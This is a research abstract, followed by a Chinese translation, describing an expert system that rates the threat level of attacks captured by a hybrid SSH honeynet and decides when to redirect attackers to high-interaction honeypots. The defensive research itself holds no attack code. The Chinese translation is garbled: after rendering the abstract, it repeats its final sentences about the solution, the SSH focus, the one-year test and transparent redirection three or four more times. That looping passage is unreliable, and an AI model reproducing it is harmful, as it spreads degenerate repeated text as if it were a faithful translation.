Abstract Currently, many systems connected to the internet are exposed to hundreds of mostly automated network attacks on a daily basis. These are mostly very simple attacks originating from botnets. However, sophisticated attacks conducted both by automated systems and directly by humans are becoming more common. In order to develop adequate countermeasures, the behaviour of attackers has to be analysed effectively. Honeypots, a sort of lures for the attacks, are used for that purpose. Configuration of honeypots vary depending on the type of attacks they focus on attracting. For simple, analogous attacks that sequentially repeat predefined commands, medium interaction honeypots are sufficient, while more sophisticated attacks require the use of high interactive honeypots. An essential part of the analysis is to differentiate between these types of attacks to make the overall analysis efficient, in terms of efficient use of hardware resources, and effective by providing the attacker with an appropriately emulated environment. This article first analyses the current situation followed by presenting a solution in the form of a system made up of a hybrid honeynet and an expert system. For now, it focuses only on the SSH protocol, as it is widely used for remote system access and is a popular target of attacks. The system has been tested on real data collected over a one-year period. The article also deals with making redirecting SSH connections as transparent as possible.

中文翻译：

---

评估混合 SSH 蜜网攻击威胁级别的专家系统

摘要 目前，许多连接到 Internet 的系统每天都会遭受数百次自动化的网络攻击。这些大多是源自僵尸网络的非常简单的攻击。然而，由自动化系统和直接由人类进行的复杂攻击正变得越来越普遍。为了制定适当的对策，必须有效地分析攻击者的行为。蜜罐是攻击的一种诱饵，用于此目的。蜜罐的配置取决于它们专注于吸引的攻击类型。对于顺序重复预定义命令的简单、类似的攻击，中等交互蜜罐就足够了，而更复杂的攻击需要使用高交互蜜罐。分析的一个重要部分是区分这些类型的攻击，以便在硬件资源的有效使用方面使整体分析有效，并通过为攻击者提供适当的模拟环境而有效。本文首先分析了当前的情况，然后以混合蜜网和专家系统组成的系统的形式提出了解决方案。目前，它只关注 SSH 协议，因为它广泛用于远程系统访问，并且是一个流行的攻击目标。该系统已经在一年内收集的真实数据上进行了测试。本文还涉及使重定向 SSH 连接尽可能透明。通过为攻击者提供适当的模拟环境而有效。本文首先分析了当前的情况，然后以混合蜜网和专家系统组成的系统的形式提出了解决方案。目前，它只关注 SSH 协议，因为它广泛用于远程系统访问，并且是一个流行的攻击目标。该系统已经在一年内收集的真实数据上进行了测试。本文还涉及使重定向 SSH 连接尽可能透明。通过为攻击者提供适当的模拟环境而有效。本文首先分析了当前的情况，然后以混合蜜网和专家系统组成的系统的形式提出了解决方案。目前，它只关注 SSH 协议，因为它广泛用于远程系统访问，并且是一个流行的攻击目标。该系统已经在一年内收集的真实数据上进行了测试。本文还涉及使重定向 SSH 连接尽可能透明。该系统已经在一年内收集的真实数据上进行了测试。本文还涉及使重定向 SSH 连接尽可能透明。该系统已经在一年内收集的真实数据上进行了测试。本文还涉及使重定向 SSH 连接尽可能透明。